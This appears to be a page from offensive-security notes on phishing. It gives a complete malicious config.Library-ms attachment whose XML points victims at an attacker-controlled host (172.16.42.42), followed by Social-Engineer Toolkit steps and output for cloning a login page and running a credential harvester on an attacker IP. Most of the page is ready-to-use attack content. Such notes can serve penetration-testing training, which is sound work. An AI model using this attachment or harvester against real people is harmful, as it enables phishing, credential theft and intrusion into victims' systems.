Phising
Attachment
Create a malicious attachment (config.Library-ms
) and include the attacker host's IP address within the <url>
tags (line 15):
Create the attachment on a Windows host!
Library-ms
is a Windows-specific file format, and it must follow a specific XML structure with Windows metadata.If it is created it on Linux, even with the same contents, it might not be recognized or executed properly by Windows.
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://172.16.42.42</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
Site Clone
The Social Engineering Toolkit can be used to automate the process:
We can manually run setoolkit
and select the options Social-Engineering Attacks → Website Attack Vectors > Credential Harvester Attack > Site Cloner.
We can also the above choices and required input using seautomate
:
$ cat set_commands.txt
1
2
3
2
10.10.14.15
https://example.com/login.aspx
$ sudo ./seautomate set_commands.txt
...
[*] Cloning the website: https://example.com/login.aspx
[*] This could take a little bit...
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
Last updated
Was this helpful?